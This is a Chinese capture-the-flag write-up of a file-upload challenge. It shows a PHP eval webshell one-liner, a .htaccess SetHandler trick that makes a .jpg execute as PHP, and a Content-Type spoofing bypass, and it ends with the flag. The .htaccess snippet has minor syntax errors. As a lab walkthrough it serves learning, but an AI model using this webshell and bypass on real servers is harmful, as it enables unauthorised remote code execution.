(.htaccess文件特性)[MRCTF2020]你传你呢 1

题目环境:

不难看出是一道文件上传漏洞

上传一句话木马文件

burpsuite进行抓包
<?php @eval($_POST['shell']);?>

命名为PHP文件格式

Repeater进行重放

尝试了其它后缀进行绕过都没有成功

通过 application/x-php内容类型,可以看出被识别出是PHP文件,猜测作者使用了htaccess文件更改了相关配置

了解.htaccess文件

概述来说,htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名 、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。

注意这几个字"改变文件扩展名",后面会用到

尝试传入jpg文件(一句话木马不变)

回显结果是否会有所不同

发现上传成功

访问上传的文件

图片加载失败

到这里猜想使用中国蚁剑是连接不成功的

不过咱们还是按照正常程序走一遍比较好

使用中国蚁剑进行连接

返回数据为空

到这里我们的一句话木马并没有被识别出来,或者说并没有执行,猜测被拦截

尝试上传更改后的.htaccess文件

上传.htaccess文件

php 复制代码
<FileMatch "1.jpg>
SetHandler application/x-httpd-php
</FileMatch>

上传的一句话木马文件要和1.jpg文件名一模一样

可以把这段代码理解为,将1.jpg文件内容当作PHP文件执行

发现被拦截了,更改内容类型为image/jpeg进行绕过

更改Content-Type内容类型为:image/jpeg

.htaccess文件上传成功

再次上传1.jpg的木马文件

上传成功

访问成功

尝试使用蚁剑进行连接

使用中国蚁剑进行连接



得到flag:
flag{11711c03-702e-43ac-b1fe-fec6c5297260}

相关推荐
CoderJia程序员甲22 分钟前
GitHub 热榜项目 - 日榜(2025-09-26)
ai·开源·github·ai编程·github热榜
可触的未来,发芽的智生1 小时前
新奇特:神经网络的集团作战思维,权重共享层的智慧
人工智能·python·神经网络·算法·架构
你的人类朋友1 小时前
快速搭建redis环境并使用redis客户端进行连接测试
前端·redis·后端
渡我白衣1 小时前
C++ 异常处理全解析:从语法到设计哲学
开发语言·c++·面试
jerryinwuhan2 小时前
Python数据挖掘之基础分类模型_支持向量机(SVM)
python·支持向量机·数据挖掘
StarPrayers.2 小时前
基于PyTorch的CIFAR10加载与TensorBoard可视化实践
人工智能·pytorch·python·深度学习·机器学习
深蓝电商API2 小时前
实战破解前端渲染:当 Requests 无法获取数据时(Selenium/Playwright 入门)
前端·python·selenium·playwright
悦悦子a啊2 小时前
[Java]PTA: jmu-Java-02基本语法-08-ArrayList入门
java·开发语言·算法
235162 小时前
【MySQL】数据库事务深度解析:从四大特性到隔离级别的实现逻辑
java·数据库·后端·mysql·java-ee
CoderJia程序员甲2 小时前
GitHub 热榜项目 - 日榜(2025-10-02)
ai·github·开源项目·github热榜